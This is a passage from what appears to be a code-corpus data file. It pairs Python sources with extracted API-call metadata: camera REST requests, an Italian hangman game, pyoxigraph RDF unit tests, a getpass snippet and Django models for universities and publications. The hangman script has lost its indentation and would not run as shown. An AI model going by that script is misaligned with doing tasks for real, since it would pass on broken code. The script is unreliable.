'/rtsp/live')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/live', auth=auth)\n", (3758, 3860), False, 'import requests\n'), ((4100, 4218), 'requests.get', 
'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n '/rtsp/live')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/live', auth=('', ''))\n", (4112, 4218), False, 'import requests\n'), ((4371, 4473), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/rtsp/live')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/rtsp/live', auth=auth)\n", (4383, 4473), False, 'import requests\n'), ((4768, 4885), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n '/rtsp/archive')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/archive', auth=auth)\n", (4780, 4885), False, 'import requests\n'), ((5128, 5249), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' + camId +\n '/rtsp/archive')", 'auth': "('', '')"}), "(url='http://' + slave_ip + ':' + restPort + '/api/v1/cameras/' +\n camId + '/rtsp/archive', auth=('', ''))\n", (5140, 5249), False, 'import requests\n'), ((5405, 5510), 'requests.get', 'requests.get', ([], {'url': "('http://' + slave_ip + ':' + restPort + '/api/v1/cameras/0/rtsp/archive')", 'auth': 'auth'}), "(url='http://' + slave_ip + ':' + restPort +\n '/api/v1/cameras/0/rtsp/archive', auth=auth)\n", (5417, 5510), False, 'import requests\n')] |
import random
from impiccato_disegno import d_impiccato, logo
from parole_impiccato import lista_parole
scelta_parola = random.choice(lista_parole)
print(logo)
game_over = False
energia = len(d_impiccato)-1
campo_gioco = []
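# Build the hidden board: one '_' placeholder for each letter of the chosen word.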
for i in scelta_parola:
campo_gioco += '_'
while not game_over:
    indovina = input('Guess a letter: ')
for posizione in range(len(scelta_parola)):
lettera = scelta_parola[posizione]
if lettera == indovina:
campo_gioco[posizione] = lettera
print(f"{' '.join(campo_gioco)}")
if indovina not in scelta_parola:
print(f"Hai tentato con la lettera {indovina}, non è la lettera corretta. Hai perso una vita.")
energia -= 1
if energia == 0:
game_over = True
print(f"Hai perso! La parola corretta era {scelta_parola}")
if not '_' in campo_gioco:
game_over = True
        print('Congratulations, you won!')
print(d_impiccato[energia])
| [
"random.choice"
] | [((121, 148), 'random.choice', 'random.choice', (['lista_parole'], {}), '(lista_parole)\n', (134, 148), False, 'import random\n')] |
import unittest
from pyoxigraph import *
XSD_STRING = NamedNode("http://www.w3.org/2001/XMLSchema#string")
XSD_INTEGER = NamedNode("http://www.w3.org/2001/XMLSchema#integer")
RDF_LANG_STRING = NamedNode("http://www.w3.org/1999/02/22-rdf-syntax-ns#langString")
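# Datatype IRIs used throughout the tests: xsd:string, xsd:integer and rdf:langString.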
class TestNamedNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(NamedNode("http://foo").value, "http://foo")
def test_string(self):
self.assertEqual(str(NamedNode("http://foo")), "<http://foo>")
def test_equal(self):
self.assertEqual(NamedNode("http://foo"), NamedNode("http://foo"))
self.assertNotEqual(NamedNode("http://foo"), NamedNode("http://bar"))
class TestBlankNode(unittest.TestCase):
def test_constructor(self):
self.assertEqual(BlankNode("foo").value, "foo")
self.assertNotEqual(BlankNode(), BlankNode())
def test_string(self):
self.assertEqual(str(BlankNode("foo")), "_:foo")
def test_equal(self):
self.assertEqual(BlankNode("foo"), BlankNode("foo"))
self.assertNotEqual(BlankNode("foo"), BlankNode("bar"))
self.assertNotEqual(BlankNode('foo'), NamedNode('http://foo'))
self.assertNotEqual(NamedNode('http://foo'), BlankNode('foo'))
class TestLiteral(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Literal("foo").value, "foo")
self.assertEqual(Literal("foo").datatype, XSD_STRING)
self.assertEqual(Literal("foo", language="en").value, "foo")
self.assertEqual(Literal("foo", language="en").language, "en")
self.assertEqual(Literal("foo", language="en").datatype, RDF_LANG_STRING)
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).value, "foo")
self.assertEqual(Literal("foo", datatype=XSD_INTEGER).datatype, XSD_INTEGER)
def test_string(self):
self.assertEqual(str(Literal("foo")), '"foo"')
self.assertEqual(str(Literal("foo", language="en")), '"foo"@en')
self.assertEqual(
str(Literal("foo", datatype=XSD_INTEGER)),
'"foo"^^<http://www.w3.org/2001/XMLSchema#integer>',
)
def test_equals(self):
self.assertEqual(Literal("foo", datatype=XSD_STRING), Literal("foo"))
self.assertEqual(
Literal("foo", language="en", datatype=RDF_LANG_STRING),
Literal("foo", language="en"),
)
self.assertNotEqual(NamedNode('http://foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), NamedNode('http://foo'))
self.assertNotEqual(BlankNode('foo'), Literal('foo'))
self.assertNotEqual(Literal('foo'), BlankNode('foo'))
class TestTriple(unittest.TestCase):
def test_constructor(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
def test_mapping(self):
t = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
def test_destruct(self):
(s, p, o) = Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestQuad(unittest.TestCase):
def test_constructor(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t.subject, NamedNode("http://example.com/s"))
self.assertEqual(t.predicate, NamedNode("http://example.com/p"))
self.assertEqual(t.object, NamedNode("http://example.com/o"))
self.assertEqual(t.graph_name, NamedNode("http://example.com/g"))
self.assertEqual(
t.triple,
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
)
self.assertEqual(
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
),
Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
DefaultGraph(),
),
)
def test_mapping(self):
t = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(t[0], NamedNode("http://example.com/s"))
self.assertEqual(t[1], NamedNode("http://example.com/p"))
self.assertEqual(t[2], NamedNode("http://example.com/o"))
self.assertEqual(t[3], NamedNode("http://example.com/g"))
def test_destruct(self):
(s, p, o, g) = Quad(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
NamedNode("http://example.com/g"),
)
self.assertEqual(s, NamedNode("http://example.com/s"))
self.assertEqual(p, NamedNode("http://example.com/p"))
self.assertEqual(o, NamedNode("http://example.com/o"))
self.assertEqual(g, NamedNode("http://example.com/g"))
def test_string(self):
self.assertEqual(
str(
Triple(
NamedNode("http://example.com/s"),
NamedNode("http://example.com/p"),
NamedNode("http://example.com/o"),
)
),
"<http://example.com/s> <http://example.com/p> <http://example.com/o> .",
)
class TestVariable(unittest.TestCase):
def test_constructor(self):
self.assertEqual(Variable("foo").value, "foo")
def test_string(self):
self.assertEqual(str(Variable("foo")), "?foo")
def test_equal(self):
self.assertEqual(Variable("foo"), Variable("foo"))
self.assertNotEqual(Variable("foo"), Variable("bar"))
if __name__ == "__main__":
unittest.main()
| [
"unittest.main"
] | [((7347, 7362), 'unittest.main', 'unittest.main', ([], {}), '()\n', (7360, 7362), False, 'import unittest\n')] |
import getpass  # getpass prompts for a password without echoing the input
dpass = getpass.getpass(prompt="Enter the password: ")  # without the prompt argument, the default prompt is 'Password: '
print(f"The entered password is {dpass}") | [
"getpass.getpass"
] | [((46, 92), 'getpass.getpass', 'getpass.getpass', ([], {'prompt': '"""Enter the password: """'}), "(prompt='Enter the password: ')\n", (61, 92), False, 'import getpass\n')] |
from django.db import models
import datetime
class Region(models.Model):
name = models.CharField(max_length=200)
class University(models.Model):
address = models.CharField(max_length=255)
affilation_name = models.CharField(max_length=255)
author_count = models.IntegerField(default=0)
city = models.CharField(max_length=200)
country = models.CharField(max_length=200)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
identifier = models.CharField(max_length=200)
org_domain = models.CharField(max_length=200)
org_type = models.CharField(max_length=200)
org_url = models.CharField(max_length=200)
postal_code = models.CharField(max_length=200)
scopus_affiliation_link = models.CharField(max_length=200)
search_link = models.CharField(max_length=200)
self_link = models.CharField(max_length=200)
state = models.ForeignKey(Region, on_delete=models.CASCADE)
url = models.CharField(max_length=200)
lat = models.FloatField(default=0.0)
lon = models.FloatField(default=0.0)
class Author(models.Model):
affilation_current = models.ForeignKey(University, on_delete=models.CASCADE)
citation_count = models.IntegerField(default=0)
cited_by_count = models.IntegerField(default=0)
coauthor_count = models.IntegerField(default=0)
coauthor_link = models.CharField(max_length=255)
date_created = models.DateField()
document_count = models.IntegerField(default=0)
eid = models.CharField(max_length=200)
given_name = models.CharField(max_length=200)
h_index = models.CharField(max_length=100)
identifier = models.CharField(max_length=100)
indexed_name = models.CharField(max_length=100)
initials = models.CharField(max_length=100)
orc_id = models.CharField(max_length=100)
publication_range = models.CharField(max_length=100)
scopus_author_link = models.CharField(max_length=255)
search_link = models.CharField(max_length=255)
self_link = models.CharField(max_length=255)
status = models.CharField(max_length=100)
surname = models.CharField(max_length=100)
url = models.CharField(max_length=255)
school_name = models.CharField(max_length=255, default='')
russian_fullname = models.CharField(max_length=255, default='')
job_category = models.CharField(max_length=255, default='')
job_position = models.CharField(max_length=255, default='')
job_unit = models.CharField(max_length=255, default='')
job_parent_unit = models.CharField(max_length=255, default='')
job_rate = models.CharField(max_length=255, default='0.0')
type_employment = models.CharField(max_length=255, default='')
date_birth = models.DateField(default=datetime.date(1900, 1, 1))
last_degree = models.CharField(max_length=255, default='')
phd = models.BooleanField(default=False)
last_academic_title = models.CharField(max_length=255, default='')
relevant = models.BooleanField(default=False)
class Journal(models.Model):
sourcetitle = models.CharField(max_length=255)
abbreviation = models.CharField(max_length=200)
type_journal = models.CharField(max_length=100)
issn = models.CharField(max_length=100)
source_id = models.IntegerField(null=True)
cnt_publications = models.IntegerField(default=0)
class Document(models.Model):
class Meta:
db_table = 'api_document'
eid = models.CharField(max_length=200)
doi = models.CharField(max_length=200)
pii = models.CharField(max_length=200, default="-1")
pubmed_id = models.CharField(max_length=200)
title = models.CharField(max_length=255)
subtype = models.CharField(max_length=200)
# subtype_description = models.CharField(max_length=200)
creator = models.ForeignKey(Author, on_delete=models.CASCADE)
author_count = models.IntegerField(default=0)
cover_date = models.DateField()
cover_display_date = models.CharField(max_length=200)
publication_name = models.CharField(max_length=255)
issn = models.ForeignKey(Journal, on_delete=models.CASCADE)
source_id = models.CharField(max_length=200)
eIssn = models.CharField(max_length=200)
aggregation_type = models.CharField(max_length=200)
volume = models.CharField(max_length=100, default="0")
issue_identifier = models.CharField(max_length=200)
article_number = models.CharField(max_length=200)
page_range = models.CharField(max_length=200, default="-1")
description = models.TextField()
authkeywords = models.TextField()
citedby_count = models.IntegerField(default=0)
openaccess = models.IntegerField(default=0)
fund_acr = models.CharField(max_length=200)
fund_no = models.CharField(max_length=200)
fund_sponsor = models.CharField(max_length=200)
citation_by_year = models.TextField(default="")
citation_by_year_with_self = models.TextField(default="")
class Subject(models.Model):
name = models.CharField(max_length=200)
full_name = models.CharField(max_length=255)
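# The models below are join tables for the many-to-many relations between documents, authors, subjects, journals and universities.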
class DocumentSubject(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE, default=0)
class AuthorJournal(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_journal = models.ForeignKey(Journal, on_delete=models.CASCADE, default=0)
class AuthorUniversity(models.Model):
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
class DocumentAuthorUniversity(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_auth = models.ForeignKey(Author, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class AuthorSubject(models.Model):
id_author = models.ForeignKey(Author, on_delete=models.CASCADE)
id_sub = models.ForeignKey(Subject, on_delete=models.CASCADE)
class DocumentUniversityAffiliations(models.Model):
id_doc = models.ForeignKey(Document, on_delete=models.CASCADE, default=0, null=True)
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0, null=True)
class Rankings(models.Model):
name = models.CharField(max_length=255)
class UniversityRankPlace(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
year = models.IntegerField(default=0)
place = models.CharField(max_length=255, default="")
class UniversityRankCriteria(models.Model):
id_university = models.ForeignKey(University, on_delete=models.CASCADE, default=0)
id_ranking = models.ForeignKey(Rankings, on_delete=models.CASCADE, default=0)
criteria = models.CharField(max_length=255, default="")
score = models.FloatField(default=0.0)
class DateCitationCount(models.Model):
date = models.DateField(auto_now=True)
citation_count = models.IntegerField(default=0)
self_citation_count = models.IntegerField(default=0)
| [
"django.db.models.TextField",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"datetime.date",
"django.db.models.FloatField",
"django.db.models.BooleanField",
"django.db.models.IntegerField",
"django.db.models.DateField"
] | [((86, 118), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (102, 118), False, 'from django.db import models\n'), ((167, 199), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (183, 199), False, 'from django.db import models\n'), ((222, 254), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (238, 254), False, 'from django.db import models\n'), ((274, 304), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (293, 304), False, 'from django.db import models\n'), ((316, 348), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (332, 348), False, 'from django.db import models\n'), ((363, 395), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (379, 395), False, 'from django.db import models\n'), ((415, 433), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (431, 433), False, 'from django.db import models\n'), ((455, 485), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (474, 485), False, 'from django.db import models\n'), ((496, 528), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (512, 528), False, 'from django.db import models\n'), ((546, 578), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (562, 578), False, 'from django.db import models\n'), ((596, 628), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (612, 628), False, 'from django.db import models\n'), ((644, 676), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (660, 676), False, 'from django.db import models\n'), ((691, 723), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (707, 723), False, 'from django.db import models\n'), ((742, 774), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (758, 774), False, 'from django.db import models\n'), ((805, 837), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (821, 837), False, 'from django.db import models\n'), ((856, 888), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (872, 888), False, 'from django.db import models\n'), ((905, 937), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (921, 937), False, 'from django.db import models\n'), ((950, 1001), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Region'], {'on_delete': 'models.CASCADE'}), '(Region, on_delete=models.CASCADE)\n', (967, 1001), False, 'from django.db import models\n'), ((1012, 1044), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1028, 1044), False, 'from django.db import models\n'), ((1055, 1085), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0.0)'}), '(default=0.0)\n', (1072, 1085), False, 'from django.db import models\n'), ((1096, 1126), 'django.db.models.FloatField', 'models.FloatField', ([], {'default': '(0.0)'}), '(default=0.0)\n', (1113, 1126), False, 'from django.db 
import models\n'), ((1182, 1237), 'django.db.models.ForeignKey', 'models.ForeignKey', (['University'], {'on_delete': 'models.CASCADE'}), '(University, on_delete=models.CASCADE)\n', (1199, 1237), False, 'from django.db import models\n'), ((1259, 1289), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1278, 1289), False, 'from django.db import models\n'), ((1311, 1341), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1330, 1341), False, 'from django.db import models\n'), ((1363, 1393), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1382, 1393), False, 'from django.db import models\n'), ((1414, 1446), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (1430, 1446), False, 'from django.db import models\n'), ((1466, 1484), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (1482, 1484), False, 'from django.db import models\n'), ((1506, 1536), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (1525, 1536), False, 'from django.db import models\n'), ((1547, 1579), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1563, 1579), False, 'from django.db import models\n'), ((1597, 1629), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1613, 1629), False, 'from django.db import models\n'), ((1644, 1676), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1660, 1676), False, 'from django.db import models\n'), ((1694, 1726), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1710, 1726), False, 'from django.db import models\n'), ((1746, 1778), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1762, 1778), False, 'from django.db import models\n'), ((1794, 1826), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1810, 1826), False, 'from django.db import models\n'), ((1840, 1872), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1856, 1872), False, 'from django.db import models\n'), ((1897, 1929), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (1913, 1929), False, 'from django.db import models\n'), ((1955, 1987), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (1971, 1987), False, 'from django.db import models\n'), ((2006, 2038), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (2022, 2038), False, 'from django.db import models\n'), ((2055, 2087), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (2071, 2087), False, 'from django.db import models\n'), ((2101, 2133), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (2117, 2133), False, 'from django.db import models\n'), ((2148, 2180), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (2164, 2180), False, 'from django.db import models\n'), ((2191, 2223), 'django.db.models.CharField', 
'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (2207, 2223), False, 'from django.db import models\n'), ((2242, 2286), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2258, 2286), False, 'from django.db import models\n'), ((2310, 2354), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2326, 2354), False, 'from django.db import models\n'), ((2374, 2418), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2390, 2418), False, 'from django.db import models\n'), ((2438, 2482), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2454, 2482), False, 'from django.db import models\n'), ((2498, 2542), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2514, 2542), False, 'from django.db import models\n'), ((2565, 2609), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2581, 2609), False, 'from django.db import models\n'), ((2625, 2672), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '"""0.0"""'}), "(max_length=255, default='0.0')\n", (2641, 2672), False, 'from django.db import models\n'), ((2695, 2739), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2711, 2739), False, 'from django.db import models\n'), ((2827, 2871), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2843, 2871), False, 'from django.db import models\n'), ((2882, 2916), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2901, 2916), False, 'from django.db import models\n'), ((2943, 2987), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)', 'default': '""""""'}), "(max_length=255, default='')\n", (2959, 2987), False, 'from django.db import models\n'), ((3003, 3037), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (3022, 3037), False, 'from django.db import models\n'), ((3087, 3119), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (3103, 3119), False, 'from django.db import models\n'), ((3139, 3171), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3155, 3171), False, 'from django.db import models\n'), ((3191, 3223), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (3207, 3223), False, 'from django.db import models\n'), ((3235, 3267), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)'}), '(max_length=100)\n', (3251, 3267), False, 'from django.db import models\n'), ((3284, 3314), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (3303, 3314), False, 'from django.db import models\n'), ((3338, 3368), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (3357, 3368), 
False, 'from django.db import models\n'), ((3466, 3498), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3482, 3498), False, 'from django.db import models\n'), ((3509, 3541), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3525, 3541), False, 'from django.db import models\n'), ((3552, 3598), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'default': '"""-1"""'}), "(max_length=200, default='-1')\n", (3568, 3598), False, 'from django.db import models\n'), ((3615, 3647), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3631, 3647), False, 'from django.db import models\n'), ((3660, 3692), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (3676, 3692), False, 'from django.db import models\n'), ((3707, 3739), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3723, 3739), False, 'from django.db import models\n'), ((3815, 3866), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE'}), '(Author, on_delete=models.CASCADE)\n', (3832, 3866), False, 'from django.db import models\n'), ((3886, 3916), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (3905, 3916), False, 'from django.db import models\n'), ((3934, 3952), 'django.db.models.DateField', 'models.DateField', ([], {}), '()\n', (3950, 3952), False, 'from django.db import models\n'), ((3978, 4010), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (3994, 4010), False, 'from django.db import models\n'), ((4034, 4066), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (4050, 4066), False, 'from django.db import models\n'), ((4078, 4130), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Journal'], {'on_delete': 'models.CASCADE'}), '(Journal, on_delete=models.CASCADE)\n', (4095, 4130), False, 'from django.db import models\n'), ((4147, 4179), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4163, 4179), False, 'from django.db import models\n'), ((4192, 4224), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4208, 4224), False, 'from django.db import models\n'), ((4248, 4280), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4264, 4280), False, 'from django.db import models\n'), ((4294, 4339), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(100)', 'default': '"""0"""'}), "(max_length=100, default='0')\n", (4310, 4339), False, 'from django.db import models\n'), ((4363, 4395), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4379, 4395), False, 'from django.db import models\n'), ((4417, 4449), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4433, 4449), False, 'from django.db import models\n'), ((4467, 4513), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'default': '"""-1"""'}), "(max_length=200, default='-1')\n", (4483, 4513), False, 'from django.db import models\n'), ((4532, 4550), 'django.db.models.TextField', 
'models.TextField', ([], {}), '()\n', (4548, 4550), False, 'from django.db import models\n'), ((4570, 4588), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (4586, 4588), False, 'from django.db import models\n'), ((4609, 4639), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (4628, 4639), False, 'from django.db import models\n'), ((4657, 4687), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (4676, 4687), False, 'from django.db import models\n'), ((4703, 4735), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4719, 4735), False, 'from django.db import models\n'), ((4750, 4782), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4766, 4782), False, 'from django.db import models\n'), ((4802, 4834), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (4818, 4834), False, 'from django.db import models\n'), ((4858, 4886), 'django.db.models.TextField', 'models.TextField', ([], {'default': '""""""'}), "(default='')\n", (4874, 4886), False, 'from django.db import models\n'), ((4920, 4948), 'django.db.models.TextField', 'models.TextField', ([], {'default': '""""""'}), "(default='')\n", (4936, 4948), False, 'from django.db import models\n'), ((4991, 5023), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (5007, 5023), False, 'from django.db import models\n'), ((5040, 5072), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(255)'}), '(max_length=255)\n', (5056, 5072), False, 'from django.db import models\n'), ((5125, 5189), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Document'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Document, on_delete=models.CASCADE, default=0)\n', (5142, 5189), False, 'from django.db import models\n'), ((5203, 5266), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Subject'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Subject, on_delete=models.CASCADE, default=0)\n', (5220, 5266), False, 'from django.db import models\n'), ((5318, 5380), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Author'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Author, on_delete=models.CASCADE, default=0)\n', (5335, 5380), False, 'from django.db import models\n'), ((5398, 5461), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Journal'], {'on_delete': 'models.CASCADE', 'default': '(0)'}), '(Journal, on_delete=models.CASCADE, default=0)\n', (5415, 5461), False, 'from django.db import models\n'), ((5516, 5578), 'django.db.models.ForeignKey', 'models.ForeignKey', 